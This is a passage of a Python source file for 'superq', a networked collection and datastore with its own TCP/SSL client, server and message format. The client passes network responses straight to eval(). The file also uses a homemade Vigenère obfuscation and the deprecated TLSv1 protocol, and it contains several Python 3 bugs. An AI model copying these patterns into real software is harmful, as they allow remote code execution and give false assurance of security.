file\n if buildFromStr:\n self.buildFromStr(initObj, attach)\n self.initialized = True\n return\n elif buildFromFile:\n self.buildFromFile(initObj, attach)\n self.initialized = True\n return\n\n if isinstance(initObj, superq):\n # self.__copy__ and __deepcopy__ arrive here\n for elem in initObj:\n self.create_elem(copy(elem), name = elem.name)\n elif isinstance(initObj, list):\n for item in initObj:\n self.create_elem(item)\n elif isinstance(initObj, dict):\n for key, value in initObj.items():\n self.create_elem(value, name = key)\n else:\n raise TypeError('Unsupported type ({0})'.format(type(initObj)))\n\n # creates new superq in datastore or attaches to existing one\n if attach:\n self.attach()\n\n # skip __init__ in the future if superq is returned by __new__\n self.initialized = True\n\n def __get_publicName(self): \n if self.host is None:\n return self.name\n return '{0}.{1}'.format(self.host, self.name)\n\n def __len__(self):\n return len(self.__internalList)\n\n def __contains__(self, key):\n return key in self.__internalDict\n\n def __iter__(self):\n self.next = self.__internalList.head\n\n return self\n\n def __next__(self):\n elem = self.next\n\n if self.next:\n self.next = self.next.next\n else:\n raise StopIteration\n\n # if superqelem is scalar, just return value\n if elem.value is not None:\n return elem.value\n\n return elem.demarshal(self.objSample)\n\n def __getitem__(self, val):\n if isinstance(val, slice):\n start, stop, step = val.indices(len(self))\n\n sq = superq([])\n if start in self.__internalDict:\n sqe = self.__internalDict[start]\n sq.create_elem(copy(sqe))\n while sqe.name != stop:\n sqe = sqe.next\n if sqe.name == start:\n break\n sq.create_elem(copy(sqe))\n elif isinstance(start, int):\n sqSlice = self.__internalList[val]\n for sqe in sqSlice:\n sq.create_elem(copy(sqe))\n else:\n raise TypeError('Invalid type ({0})'.format(type(val)))\n\n return sq\n elif val in self.__internalDict:\n elem = self.__internalDict[val]\n elif isinstance(val, int):\n if val < len(self.__internalDict):\n # if element isn't keyed on the int, use it as an index\n elem = self.__internalList[val]\n else:\n raise KeyError('Invalid key ({0})'.format(val))\n else:\n raise TypeError('Invalid type ({0})'.format(type(val)))\n\n return self.__unwrap_elem(elem)\n\n def __setitem__(self, key, value):\n if key in self.__internalDict:\n elem = self.__internalDict[key]\n elif isinstance(key, int) and key < len(self):\n # if element isn't keyed on the int, try the int as an index\n elem = self.__internalList[key] \n else:\n self.create_elem(value, key)\n return\n\n # set scalar value\n if elem.value is not None:\n elem.set_scalar(value)\n return\n \n raise NotImplemented('__setitem__ by index for non-scalars')\n\n def __delitem__(self, key):\n raise NotImplemented('superq.__delitem__()')\n\n def __missing__(self, key):\n raise KeyError(key)\n\n def __basecopy(self):\n return superq(self, name = self.name, attach = False)\n\n def __copy__(self):\n return self.__basecopy()\n\n def __deepcopy__(self):\n return self.__basecopy()\n\n def __str__(self):\n sqHdr = '{0},{1};'.format(self.name, len(self.__internalList))\n\n # serialize necessary attributes as name-value pairs\n sqAttrs = ''\n sqAttrs += 'host|{0},'.format(self.host)\n sqAttrs += 'keyCol|{0},'.format(self.keyCol)\n sqAttrs += 'maxlen|{0},'.format(self.maxlen)\n sqAttrs += 'autoKey|{0}'.format(self.autoKey)\n sqAttrs += ';'\n\n sqElems = ''\n for sqe in self.__internalList:\n sqeStr = str(sqe)\n sqElems += '{0},{1}'.format(len(sqeStr), sqeStr)\n\n sqStr = '{0}{1}{2}'.format(sqHdr, sqAttrs, sqElems)\n\n return sqStr\n\n # returns value wrapped in superqelem if it was not already\n def __wrap_elem(self, value, name = None):\n if isinstance(value, superqelem):\n sqe = value\n else:\n # if autoKey on, name will be assigned\n if self.autoKey:\n name = 'sqe' + str(uuid4().hex)\n elif self.keyCol is not None:\n try:\n name = getattr(value, self.keyCol)\n except:\n raise KeyError('Key field {0} not found.'.format(name))\n elif name is None:\n raise ValueError('name is None with no autoKey or keyCol')\n\n sqe = superqelem(name, value, parentSq = self)\n\n return sqe\n\n # if elem is scalar, returns value or demarshals sqe if possible\n def __unwrap_elem(self, sqe):\n # if superqelem is scalar, just return value\n if sqe.value is not None:\n return sqe.value\n\n # sqe is now detached\n sqe.parentSq = None\n\n # demarshal into user object if possible\n returnObj = sqe.demarshal(self.objSample)\n\n return returnObj\n\n # looks up elem from user object or else raises ObjectNotRecognized\n def __lookup_elem(self, obj):\n if isinstance(obj, superqelem):\n name = obj.name\n elif self.keyCol is not None:\n try:\n name = getattr(obj, self.keyCol)\n except:\n raise ObjectNotRecognized('keyCol not found')\n else:\n try:\n name = obj._superqelemKey\n except:\n raise ObjectNotRecognized('no superqelemKey')\n\n return self.__internalDict[name]\n\n def buildFromStr(self, sqStr, attach = False):\n # initialize internal storage\n self.__internalList = LinkedList()\n self.__internalDict = {}\n\n # separate out sq header from remainder\n headerSeparatorIdx = sqStr.index(';')\n sqHeader = sqStr[ : headerSeparatorIdx]\n sqStr = sqStr[headerSeparatorIdx + 1 : ]\n\n # get name and number of fields from sq header\n headerElems = sqHeader.split(',')\n self.name = headerElems[0]\n numSqes = int(headerElems[1])\n\n # separate out attributes from remainder\n headerSeparatorIdx = sqStr.index(';')\n sqAttrs = sqStr[ : headerSeparatorIdx]\n sqStr = sqStr[headerSeparatorIdx + 1 : ]\n\n # set attributes\n attrElems = sqAttrs.split(',')\n for attr in attrElems:\n name, value = attr.split('|')\n\n if value.startswith('None'):\n value = None\n\n setattr(self, name, value)\n\n if attach:\n self.attach()\n\n # parse out each superqelem\n for i in range(0, numSqes):\n # separate field length indicator from remainder\n separatorIdx = sqStr.index(',')\n elemLen = int(sqStr[ : separatorIdx])\n sqStr = sqStr[separatorIdx + 1 : ]\n\n # slice the rest of the sqe out\n sqeStr = sqStr[ : elemLen]\n sqStr = sqStr[elemLen : ]\n\n # deserialize sqe from string fragment\n sqe = superqelem(sqeStr, parentSq = self, buildFromStr = True)\n\n # add element to internal dictionary and tail of internal list\n self.__internalDict[sqe.name] = sqe\n self.__internalList.push_tail(sqe)\n\n def buildFromFile(self, fileName, attach = False):\n with open(fileName) as infile:\n sqHdr = infile.readline().rstrip()\n\n self.name = sqHdr\n\n sqAttrs = infile.readline().rstrip()\n\n # set attributes\n attrElems = sqAttrs.split(',')\n for attr in attrElems:\n name, value = attr.split('|')\n\n if value.startswith('None'):\n value = None\n\n setattr(self, name, value)\n\n if attach:\n self.attach()\n\n for line in infile:\n # deserialize sqe from string fragment\n sqe = superqelem(line, parentSq = self, buildFromStr = True)\n\n # add sqe to sq\n self.push(sqe)\n\n def save(self, fileName):\n with open(fileName, 'w') as f:\n sqHdr = '{0}'.format(self.name)\n f.write('{0}\\n'.format(sqHdr))\n\n # serialize relevant attributes as name-value pairs\n sqAttrs = ''\n sqAttrs += 'host|{0},'.format(self.host)\n sqAttrs += 'keyCol|{0},'.format(self.keyCol)\n sqAttrs += 'maxlen|{0},'.format(self.maxlen)\n sqAttrs += 'autoKey|{0}'.format(self.autoKey)\n\n f.write('{0}\\n'.format(sqAttrs))\n\n for sqe in self.__internalList:\n f.write('{0}\\n'.format(str(sqe)))\n\n # returns superqelems without any attempt at demarshalling\n def n(self, key):\n if key in self.__internalDict:\n return self.__internalDict[key]\n elif isinstance(key, int) and key < len(self.__internalDict):\n # if element isn't keyed on the int, try the int as an index\n return self.__internalList[key] \n else:\n raise KeyError(key)\n\n # returns internal list\n def _list(self):\n return self.__internalList\n\n # return internal list as python list\n def list(self):\n return [val for val in self]\n\n def dict(self):\n return self.__internalDict\n\n def attach(self):\n if self.attached:\n raise Exception('Already attached!')\n\n if self.dataStore.superq_exists(self.name, self.host, self.secure):\n raise NotImplemented('Not yet allowed to attach existing superqs.')\n\n self.attached = True\n\n self.dataStore.superq_create(self, self.secure)\n\n # if attaching a locally-backed superq, back each elem\n if self.host is None or self.dataStore.public:\n # create each elem. The 1st one triggers backing table creation\n for sqe in self.__internalList:\n self.create_elem_datastore_only(sqe)\n\n def detach(self):\n if not self.attached:\n raise Exception('Not attached!')\n\n self.attached = False\n\n def reload(self):\n raise NotImplemented(superq.reload())\n\n def query(self, colLst, tableLst, conditionalStr, objSample = None):\n if not self.attached:\n raise NotImplemented('queries not supported on detached superqs')\n\n return self.dataStore.superq_query(self,\n colLst,\n tableLst,\n conditionalStr,\n objSample,\n self.secure)\n\n def update(self):\n raise NotImplemented(superq.update())\n\n def delete(self):\n if self.attached:\n self.attached = False\n self.dataStore.superq_delete(self, self.secure)\n\n # inspect first sqe to determine backing table characteristics\n def __initialize_on_first_elem(self, sqe):\n self.nameStr = ''\n self.nameTypeStr = ''\n\n # scalar superqelem\n if sqe.value is not None:\n self.nameStr = '_name_,_val_,_links_'\n\n self.nameTypeStr = '_name_ TEXT,'\n if sqe.valueType.startswith('str'):\n self.nameTypeStr += '_val_ TEXT'\n elif sqe.valueType.startswith('int'):\n self.nameTypeStr += '_val_ INTEGER'\n elif sqe.valueType.startswith('float'):\n self.nameTypeStr += '_val_ REAL'\n elif sqe.valueType.startswith('byte'):\n self.nameTypeStr += '_val_ BLOB'\n\n # special _links_ column\n self.nameTypeStr += ',_links_ TEXT'\n\n self.colNames = ['_name_', '_val_', '_links_']\n self.colTypes = ['str', sqe.valueType, 'str']\n \n return\n\n colNames = []\n colTypes = []\n\n # support autoKey\n if self.keyCol is None:\n self.nameStr = '_name_,'\n self.nameTypeStr = '_name_ TEXT,'\n colNames = ['_name_']\n colTypes = ['str']\n\n # non-scalar superqelem\n for atom in sqe:\n if atom.type.startswith('str'):\n self.nameTypeStr += '{0} TEXT,'.format(atom.name)\n elif atom.type.startswith('int'):\n self.nameTypeStr += '{0} INTEGER,'.format(atom.name)\n elif atom.type.startswith('float'):\n self.nameTypeStr += '{0} REAL,'.format(atom.name)\n elif atom.type.startswith('byte'):\n self.nameTypeStr += '{0} BLOB,'.format(atom.name)\n else:\n raise TypeError('Unsupported type {0}'.format(atom.type))\n\n colTypes.append(atom.type)\n\n # add column name to list of names and name string\n colNames.append(atom.name)\n self.nameStr += '{0},'.format(atom.name)\n\n # strip trailing commas\n self.nameStr = self.nameStr.rstrip(',')\n self.nameTypeStr = self.nameTypeStr.rstrip(',')\n\n # append special _links_ column info\n self.nameStr += ',_links_'\n self.nameTypeStr += ',_links_ TEXT'\n colNames.append('_links_')\n colTypes.append('str')\n\n self.colNames = colNames\n self.colTypes = colTypes\n\n def create_elem_datastore_only(self, sqe, idx = None):\n # enable sqe to trigger datastore updates through parent sq\n sqe.parentSq = self\n\n # build understanding of backing table the 1st time through\n if not self.colNames:\n # build understanding of object structure\n self.__initialize_on_first_elem(sqe)\n\n # set flag to create table if non-hosted or dataStore is public\n if self.host is None or self.dataStore.public:\n self.createTable = True\n\n if self.attached:\n self.dataStore.superqelem_create(self,\n sqe,\n idx,\n self.createTable,\n self.secure)\n\n if self.createTable:\n self.createTable = False\n\n def create_elem(self, value, name = None, idx = None):\n return self.push(self.__wrap_elem(value, name), idx)\n\n def read_elem(self, key = None, idx = None):\n if key is not None:\n return self[key]\n elif idx is not None:\n return self.__internalList[idx]\n else:\n # efficiently return random element without list traversal\n keys = self.__internalDict.keys()\n return self.__internalDict[keys[random.randrange(0, len(keys))]]\n\n # exists for sqe.__setProperty() to update datastore without recursing\n def update_elem_datastore_only(self, sqe):\n if self.attached:\n self.dataStore.superqelem_update(self, sqe, self.secure)\n\n def update_elem(self, value):\n if isinstance(value, superqelem):\n sqe = value\n\n # if sqe is not attached\n if sqe.parentSq is None:\n # lookup attached sqe\n attachedSqe = self.__internalDict[sqe.name]\n\n # handle scalars\n attachedSqe.set_scalar(sqe.value)\n\n # demarshal from detached sqe to attached\n for atom in attachedSqe:\n atom.value = sqe[atom.name]\n\n # rebuild links\n attachedSqe.resetLinks()\n attachedSqe.addLinksFromStr(sqe.links)\n\n sqe = attachedSqe\n else:\n # lookup attached sqe from user object\n sqe = self.__lookup_elem(value)\n \n # marshal from user object to sqe\n for atom in sqe:\n atom.value = getattr(value, atom.name)\n\n # update attached sqe\n self.update_elem_datastore_only(sqe)\n\n def delete_elem_datastore_only(self, sqe):\n if self.attached:\n self.dataStore.superqelem_delete(self, sqe.name, self.secure)\n\n def delete_elem(self, value):\n if isinstance(value, superqelem):\n sqe = value\n elif isinstance(value, (str, int, float)) and \\\n value in self.__internalDict:\n sqe = self.__internalDict[value]\n elif isinstance(value, int) and value < len(self.__internalDict):\n sqe = self.__internalList[value]\n else:\n # lookup sqe from user object\n sqe = self.__lookup_elem(value)\n\n with self.not_empty:\n # remove element from internal collections\n self.__internalDict.pop(sqe.name)\n self.__internalList.pop_node(sqe)\n\n self.delete_elem_datastore_only(sqe)\n\n self.not_full.notify()\n\n # these thread-safe methods can be used for synchronized superq access\n\n# TODO: does it make sense to add more aliases to match for instance standard\n# list functions. Or to change the existing names?\n\n def push(self, value, idx = None, block = True, timeout = None):\n with self.not_full:\n # handle dropping an element if needed\n if self.maxlen is not None and len(self) > self.maxlen:\n if block:\n if timeout is None:\n while len(self) >= self.maxlen:\n self.not_full.wait()\n elif timeout < 0:\n raise ValueError('timeout must be non-negative')\n else:\n endtime = time() + timeout\n while len(self) >= self.maxlen:\n remaining = endtime - time()\n if remaining <= 0.0:\n raise SuperQFull('superq is full')\n self.not_full.wait(remaining)\n else:\n if self.maxlen < 0:\n raise ValueError('maxlen is negative')\n return\n elif self.maxlen is not None and len(self) == self.maxlen:\n if idx is None or idx >= len(self) - 1:\n self.pop_head()\n elif idx <= 0:\n self.pop_tail()\n else:\n raise ValueError('Cannot insert into full set')\n\n # convert value to sqe if necessary\n sqe = self.__wrap_elem(value)\n\n # add sqe to internal dictionary\n self.__internalDict[sqe.name] = sqe\n\n # add sqe to internal list\n if idx is None or idx >= len(self) - 1:\n # default to stack/LIFO behavior\n self.__internalList.push_tail(sqe)\n elif idx == 0:\n self.__internalList.push_head(sqe)\n else:\n self.__internalList.push(idx, sqe)\n\n # for now pushes on hosted superqs are slow due to blocking here\n if self.attached:\n self.create_elem_datastore_only(sqe, idx)\n\n self.not_empty.notify()\n\n # return the object for elegant create_elem()\n return sqe\n\n def push_head(self, value, block = True, timeout = None):\n return self.push(value, 0, block, timeout)\n\n def push_tail(self, value, block = True, timeout = None):\n return self.push(value, len(self), block, timeout)\n\n def pop(self, idx = None, block = True, timeout = None):\n with self.not_empty:\n if not block:\n if len(self) == 0:\n raise SuperQEmpty('no elements in superq')\n elif timeout is None:\n while len(self) == 0:\n self.not_empty.wait()\n elif timeout < 0:\n raise ValueError('timeout must be non-negative')\n else:\n endtime = time() + timeout\n while len(self) == 0:\n remaining = endtime - time()\n if remaining <= 0.0:\n raise SuperQEmpty\n self.not_empty.wait(remaining)\n\n # default to stack/LIFO behavior\n if idx is None:\n idx = len(self) - 1\n\n # remove element from internal collections\n sqe = self.__internalList.pop(idx)\n self.__internalDict.pop(sqe.name)\n\n # for now pops on hosted superqs are slow due to blocking here\n if self.attached:\n self.delete_elem_datastore_only(sqe)\n\n self.not_full.notify()\n\n return self.__unwrap_elem(sqe)\n\n def pop_head(self, block = True, timeout = None):\n return self.pop(0, block, timeout)\n\n def pop_tail(self, block = True, timeout = None):\n return self.pop(len(self) - 1, block, timeout)\n\n # rotate superqelems n steps to the right. If n is negative, rotates left\n def rotate(self, n):\n # iterate to the indicated index\n if n >= 0:\n for i in range(0, n):\n self.push_head(self.pop_tail())\n else:\n for i in range(1, abs(n)):\n self.push_tail(self.pop_head())\n\n # waits for superq to be empty\n def join(self):\n raise NotImplemented('superq.join()')\n\n# create public network node instance or private instance for program\n_dataStore = SuperQDataStore()\n\n_nodeRequestNextId = 1\n_nodeRequestLock = Lock()\nclass SuperQNodeRequest():\n def __init__(self, msg_id_ = '', cmd_ = 0, args_ = '', body_ = ''):\n self.msg_id = msg_id_\n self.cmd = cmd_\n self.args = args_\n self.body = body_\n\n if self.msg_id == '':\n self.__set_msg_id()\n\n def __set_msg_id(self):\n global _nodeRequestNextId\n global _nodeRequestLock\n\n _nodeRequestLock.acquire()\n self.msg_id = str(_nodeRequestNextId)\n _nodeRequestNextId += 1\n _nodeRequestLock.release()\n\n def __str__(self):\n return '{0}|{1}|{2}%{3}'.format(self.msg_id,\n self.cmd,\n self.args,\n self.body)\n\n def from_str(self, requestStr):\n try: \n headerSeparatorIdx = requestStr.index('%')\n\n # separate out cmd header and body\n cmdHeader = requestStr[ : headerSeparatorIdx]\n body = requestStr[headerSeparatorIdx + 1 : ]\n\n elems = cmdHeader.split('|')\n\n if len(elems) != 3:\n raise MalformedNetworkRequest(requestStr)\n\n self.msg_id = elems[0]\n self.cmd = SQNodeCmd(int(elems[1]))\n self.args = elems[2]\n self.body = body\n except Exception as e:\n exceptStr = 'Request: {0}\\nException: {1}'.format(requestStr, e)\n raise MalformedNetworkRequest(exceptStr)\n\nclass SuperQNodeResponse():\n def __init__(self, msg_id_ = '', result_ = '', body_ = ''):\n self.msg_id = msg_id_\n self.result = result_\n self.body = body_\n\n def __str__(self):\n return '{0}|{1}%{2}'.format(self.msg_id,\n self.result,\n self.body)\n\n def from_str(self, responseStr):\n try:\n headerSeparatorIdx = responseStr.index('%')\n \n # separate out cmd header and body\n responseHeader = responseStr[ : headerSeparatorIdx]\n responseBody = responseStr[headerSeparatorIdx + 1 : ]\n\n elems = responseHeader.split('|')\n\n if len(elems) != 2:\n raise MalformedNetworkResponse(responseStr)\n\n self.msg_id = elems[0]\n self.result = elems[1]\n self.body = responseBody\n except Exception as e:\n exceptStr = 'Response: {0}\\nException: {1}'.format(responseStr, e)\n raise MalformedNetworkResponse(exceptStr)\n\n# vigenere\nfrom base64 import urlsafe_b64encode, urlsafe_b64decode\nclass NetworkPrep():\n @staticmethod\n def prep(key, clear):\n enc = []\n for i in range(len(clear)):\n key_c = key[i % len(key)]\n enc_c = chr((ord(clear[i]) + ord(key_c)) % 256)\n enc.append(enc_c)\n return urlsafe_b64encode(\"\".join(enc))\n\n @staticmethod\n def deprep(key, enc):\n dec = []\n enc = urlsafe_b64decode(enc)\n for i in range(len(enc)):\n key_c = key[i % len(key)]\n dec_c = chr((256 + ord(enc[i]) - ord(key_c)) % 256)\n dec.append(dec_c)\n return \"\".join(dec)\n\n# manages network connections and requests to network nodes\nclass SuperQNetworkClientMgr():\n def __init__(self):\n # client is currently responsible for starting up network node\n self.__nodeProcess = None\n\n self.__nodeProcessLock = Lock()\n\n # dictionary of superq-based socket pools keyed by (host, port)\n self.__socketPoolDict = {}\n\n def __start_networked_datastore(self):\n # start superq local network node\n with self.__nodeProcessLock:\n if self.__nodeProcess is not None:\n return\n\n nodeArgs = ['python3',\n 'superq.py',\n '-t',\n str(DEFAULT_TCP_PORT),\n '-s',\n str(DEFAULT_SSL_PORT)]\n\n if WIN32_POPEN_FLAGS is not None:\n self.__nodeProcess = Popen(nodeArgs,\n creationflags = WIN32_POPEN_FLAGS)\n else:\n self.__nodeProcess = Popen(nodeArgs)\n\n with open('node.pid', 'w') as f:\n f.write(str(self.__nodeProcess.pid))\n\n def shutdown(self):\n if self.__nodeProcess is not None:\n kill(self.__nodeProcess.pid, 9)\n\n # cleanup socket pools\n for key, socketPool in self.__socketPoolDict.items():\n while True:\n try:\n s = socketPool.pop(block = False)\n except SuperQEmpty:\n break\n else:\n s.close()\n\n def __new_socket(self,\n host = 'localhost',\n port = DEFAULT_TCP_PORT,\n ssl = False):\n s = socket(AF_INET, SOCK_STREAM)\n\n # convert socket to ssl if requested\n if ssl:\n s = wrap_socket(s,\n ca_certs = DEFAULT_SSL_PEM_FILE,\n cert_reqs = CERT_REQUIRED,\n ssl_version = PROTOCOL_TLSv1)\n\n try:\n s.connect((host, port))\n return s\n except ConnectionRefusedError:\n # start localhost datastore\n if host == 'localhost' and port == DEFAULT_TCP_PORT:\n self.__start_networked_datastore()\n\n # attempt to connect to datastore once it is started\n attempts = 0\n maxAttempts = 5\n while attempts < maxAttempts:\n try:\n s.connect((host, port))\n return s\n except:\n sleep(.2)\n attempts += 1\n\n raise\n\n def __get_socket(self, host, port, ssl = False): \n # get or initialize socket pool specific to host and port\n try:\n socketPool = self.__socketPoolDict[(host, port)] \n except KeyError:\n # create detached superq to use for socket pool\n socketPool = superq([])\n self.__socketPoolDict[(host, port)] = socketPool\n\n # get existing socket if available or open new one\n try:\n s = socketPool.pop(block = False)\n except SuperQEmpty:\n return self.__new_socket(host, port, ssl)\n\n return s\n\n def __return_socket(self,\n s,\n host = 'localhost',\n port = DEFAULT_TCP_PORT):\n # return socket to appropriate socket pool\n self.__socketPoolDict[(host, port)].push(s)\n\n def __send(self, s, msg):\n buffer = msg\n \n totalSent = 0\n while totalSent < len(buffer):\n bytesSent = s.send(buffer[totalSent:])\n if bytesSent == 0:\n raise RuntimeError('Connection closed.')\n totalSent = totalSent + bytesSent\n\n def __recv(self, s, bytesToRecv):\n buffer = bytearray()\n\n while len(buffer) < bytesToRecv:\n tempBuf = s.recv(bytesToRecv - len(buffer))\n if len(tempBuf) == 0:\n raise RuntimeError('Connection closed.')\n buffer += tempBuf\n \n return buffer\n\n def __get_msg(self, s):\n # first 4 bytes contain message body length\n data = bytearray()\n while len(data) < 4:\n currentData = self.__recv(s, 4 - len(data))\n\n if len(currentData) == 0:\n raise Exception('0 bytes read. Connection probably closed.')\n\n data += currentData\n\n # convert length\n messageLength = unpack('I', data)[0]\n\n # now read the rest of the message\n data = bytearray()\n while len(data) < messageLength:\n currentData = self.__recv(s, messageLength - len(data))\n\n if len(currentData) == 0:\n raise RuntimeError('Connection closed.')\n\n data += currentData\n\n # decode character data\n msg = data.decode('utf-8')\n\n # build response object from string\n response = SuperQNodeResponse()\n response.from_str(msg)\n\n return response\n\n def __send_msg(self, host, strMsg, secure = False):\n ssl = False\n\n # 'local' is shorthand for localhost:DEFAULT_PORT\n if host == 'local':\n host = 'localhost'\n port = DEFAULT_TCP_PORT\n else:\n if host.startswith('ssl:'):\n ssl, host, port = host.split(':')\n ssl = True\n port = int(port)\n else:\n try:\n host, port = host.split(':')\n port = int(port)\n except ValueError:\n port = DEFAULT_TCP_PORT\n\n msg = bytearray()\n msg.extend(pack('I', len(strMsg)))\n msg.extend(strMsg.encode('utf-8'))\n\n # get existing socket from socket pool or initialize new one\n s = self.__get_socket(host, port, ssl)\n\n # send message\n self.__send(s, msg)\n\n # get response\n response = self.__get_msg(s)\n\n # return socket to thread pool\n self.__return_socket(s, host, port)\n\n return response\n\n # this might be used in the case of create_elem for instance, to provide\n # a non-blocking operation. But it requires some kind of transactional\n # implementation or solution to prevent synchronization errors\n def __send_msg_async(self, host, strMsg, secure = False):\n t = Thread(target = self.__send_msg, args = (host, strMsg))\n t.start()\n\n def superq_exists(self, name, host, secure = False):\n # build request object from string\n request = SuperQNodeRequest()\n request.cmd = SQNodeCmd.superq_exists.value\n request.args = name\n\n response = self.__send_msg(host, str(request), secure)\n\n return eval(response.result)\n\n def superq_create(self, sq, secure = False):\n # build request object from string\n request = SuperQNodeRequest()\n request.cmd = SQNodeCmd.superq_create.value\n request.args = sq.publicName\n request.body = str(sq)\n\n response = self.__send_msg(sq.host, str(request), secure)\n\n if not eval(response.result):\n raise SuperQEx('superq_create(): {0}'.format(response))\n\n def superq_read(self, name, host, secure = False):\n # build request object from string\n request = SuperQNodeRequest()\n request.cmd = SQNodeCmd.superq_read.value\n request.args = name\n\n response = self.__send_msg(host, str(request), secure)\n\n if not eval(response.result):\n raise SuperQEx('superq_read(): {0}'.format(response))\n\n # deserialize response body into a detached superq\n sq = superq(response.body, attach = False, buildFromStr = True)\n\n return sq\n\n def superq_delete(self, sq, secure = False):\n # build request object\n request = SuperQNodeRequest()\n request.cmd = SQNodeCmd.superq_delete.value\n request.args = sq.publicName\n\n response = self.__send_msg(sq.host, str(request), secure)\n\n if not eval(response.result):\n raise SuperQEx('superq_delete(): {0}'.format(response))\n\n def superq_query(self, sq, queryStr, secure = False):\n # build request object from string\n request = SuperQNodeRequest()\n request.cmd = SQNodeCmd.superq_query.value\n request.args = sq.publicName\n request.body = queryStr\n\n response = self.__send_msg(sq.host, str(request), secure)\n\n if eval(response.result):\n return superq(response.body, attach = False, buildFromStr = True)\n else:\n raise SuperQEx('superq_query(): {0}'.format(response))\n\n def superqelem_create(self, sq, sqe, idx = None, secure = False):\n # build request object\n request = SuperQNodeRequest()\n request.cmd = SQNodeCmd.superqelem_create.value\n request.args = '{0},{1}'.format(sq.publicName, idx)\n request.body = str(sqe)\n\n response = self.__send_msg(sq.host, str(request), secure)\n\n if not eval(response.result):\n raise SuperQEx('superqelem_create(): {0}'.format(str(response)))\n\n def superqelem_update(self, sq, sqe, secure = False):\n # build request object\n request = SuperQNodeRequest()\n request.cmd = SQNodeCmd.superqelem_update.value\n request.args = '{0}'.format(sq.publicName)\n request.body = str(sqe)\n\n response = self.__send_msg(sq.host, str(request), secure)\n\n if not eval(response.result):\n raise SuperQEx('superqelem_update(): {0}'.format(str(response)))\n\n def superqelem_delete(self, sq, sqeName, secure = False):\n # build request object\n request = SuperQNodeRequest()\n request.cmd = SQNodeCmd.superqelem_delete.value\n request.args = '{0}'.format(sq.publicName)\n request.body = '{0}'.format(sqeName)\n\n response = self.__send_msg(sq.host, str(request), secure)\n\n if not eval(response.result):\n raise SuperQEx('superqelem_delete(): {0}'.format(str(response)))\n\n# deserializes requests, processes them, and serializes responses\nclass SuperQStreamHandler(StreamRequestHandler):\n def handle(self): \n # client can stay connected for multiple Request-Response transactions\n while True:\n try:\n self.handle_connection()\n except Exception as e:\n tb = format_exc()\n self.raise_error('Exception: {0}\\nTrace: {1}'.format(e, tb))\n self.request.close()\n\n def raise_error(self, msg):\n with open('node.output', 'a') as f:\n f.write('\\n' + msg)\n\n raise RuntimeError(msg)\n\n def return_response(self, response):\n strResponse = str(response)\n msg = bytearray()\n \n msg.extend(pack('I', len(strResponse)))\n msg.extend(strResponse.encode('utf-8'))\n\n self.wfile.write(msg)\n\n def handle_connection(self):\n # first 4 bytes contain message body length\n data = bytearray()\n try:\n while len(data) < 4:\n currentData = self.connection.recv(4 - len(data))\n\n if len(currentData) == 0:\n self.raise_error('connection closed while reading length')\n\n data += currentData\n except Exception as e:\n self.raise_error(str(e))\n raise\n\n # convert length\n messageLength = unpack('I', data)[0]\n\n # now read the rest of the message\n data = bytearray()\n while len(data) < messageLength:\n currentData = self.connection.recv(messageLength - len(data))\n\n if len(currentData) == 0:\n self.raise_error('connection closed during read')\n\n data += currentData\n\n # decode character data\n msg = data.decode('utf-8')\n\n # build request object from string\n request = SuperQNodeRequest()\n request.from_str(msg)\n\n # start building response\n response = SuperQNodeResponse()\n response.msg_id = request.msg_id\n response.result = str(False)\n\n cmd = request.cmd\n args = request.args\n body = request.body\n\n if cmd == SQNodeCmd.superq_exists:\n response.result = str(_dataStore.superq_exists(args))\n response.body = ''\n elif cmd == SQNodeCmd.superq_create:\n if _dataStore.superq_exists(args):\n response.result = str(False)\n else:\n # deserialize request body into a detached superq\n sq = superq(body, attach = False, buildFromStr = True)\n\n # assign superq to the node datastore\n sq.attach()\n\n response.result = str(True)\n elif cmd == SQNodeCmd.superq_read:\n sq = _dataStore.superq_read(args)\n\n response.body = str(sq)\n\n response.result = str(True)\n elif cmd == SQNodeCmd.superq_delete:\n try:\n sq = _dataStore.superq_read(args)\n except:\n raise KeyError('superq {0} does not exist'.format(args))\n\n _dataStore.superq_delete(sq)\n\n response.result = str(True)\n elif cmd == SQNodeCmd.superq_query:\n try:\n sq = _dataStore.superq_read(args)\n except:\n raise KeyError('superq {0} does not exist'.format(args))\n\n # store resulting superq in response body\n response.body = str(_dataStore.superq_query_local(body))\n\n response.result = str(True)\n elif cmd == SQNodeCmd.superqelem_exists:\n pass\n elif cmd == SQNodeCmd.superqelem_create:\n sqName, sqeIdx = args.split(',')\n\n try:\n sqeIdx = int(sqeIdx)\n except ValueError:\n sqeIdx = None\n\n try:\n sq = _dataStore.superq_read(sqName)\n except KeyError:\n raise KeyError('superq {0} does not exist'.format(sqName))\n\n # build sqe from request\n sqe = superqelem(body, buildFromStr = True)\n\n sq.create_elem(sqe, idx = sqeIdx)\n\n response.result = str(True)\n elif cmd == SQNodeCmd.superqelem_read:\n pass\n elif cmd == SQNodeCmd.superqelem_update:\n sqName = args\n\n try:\n sq = _dataStore.superq_read(sqName)\n except KeyError:\n raise KeyError('superq {0} does not exist'.format(sqName))\n\n # build sqe from request\n sqe = superqelem(body, buildFromStr = True)\n\n sq.update_elem(sqe)\n\n response.result = str(True)\n elif cmd == SQNodeCmd.superqelem_delete:\n sqName = args\n sqeName = body\n\n try:\n sq = _dataStore.superq_read(sqName)\n except KeyError:\n raise KeyError('superq {0} does not exist'.format(sqName))\n\n sq.delete_elem(sqeName)\n\n response.result = str(True)\n else:\n raise MalformedNetworkRequest(msg)\n\n self.return_response(response)\n \nclass SuperQTCPServer(TCPServer):\n def __init__(self,\n server_address,\n RequestHandlerClass,\n bind_and_activate = True):\n TCPServer.__init__(self,\n server_address,\n RequestHandlerClass,\n bind_and_activate)\n\n def get_request(self):\n newsocket, fromaddr = self.socket.accept()\n\n return newsocket, fromaddr\n\nclass SuperQTCPThreadedServer(ThreadingMixIn, SuperQTCPServer): pass\n\nclass SuperQSSLServer(TCPServer):\n def __init__(self,\n server_address,\n RequestHandlerClass,\n certfile,\n keyfile,\n ssl_version = PROTOCOL_TLSv1,\n bind_and_activate = True):\n TCPServer.__init__(self,\n server_address,\n RequestHandlerClass,\n bind_and_activate)\n self.certfile = certfile\n self.keyfile = keyfile\n self.ssl_version = ssl_version\n\n def get_request(self):\n newsocket, fromaddr = self.socket.accept()\n\n connstream = ssl.wrap_socket(newsocket,\n server_side = True,\n certfile = self.certfile,\n keyfile = self.keyfile,\n ssl_version = self.ssl_version)\n \n return connstream, fromaddr\n\nclass SuperQSSLThreadedServer(ThreadingMixIn, SuperQSSLServer): pass\n\n# provides local and remote network interfaces for networked data store\nclass SuperQNetworkNode():\n def __init__(self):\n self.__tcpServer = None\n self.__sslServer = None\n\n 